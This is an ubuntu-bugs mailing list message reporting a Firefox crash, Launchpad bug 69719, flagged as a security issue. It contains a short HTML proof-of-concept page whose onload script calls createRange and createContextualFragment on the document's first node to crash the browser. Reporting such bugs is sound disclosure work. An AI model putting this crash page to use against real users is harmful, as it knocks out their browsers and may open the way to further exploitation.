Details that I had obtained using Internet Explorer
Security bug! Malicious java script code. Confirmed!

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
<html> 
<head> 
<script type="text/javascript"> 
function do_crash() 
{ 
var range; 
 
range = document.createRange(); 
range.selectNode(document.firstChild); 
range.createContextualFragment('<span></span>'); 
} 
</script> 
</head> 
<body onload="do_crash()"> 
<p>Good bye Firefox!</p> 
</body> 
</html>

** This bug has been flagged as a security issue

-- 
Firefox crash
https://launchpad.net/bugs/69719

-- 
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Reply via email to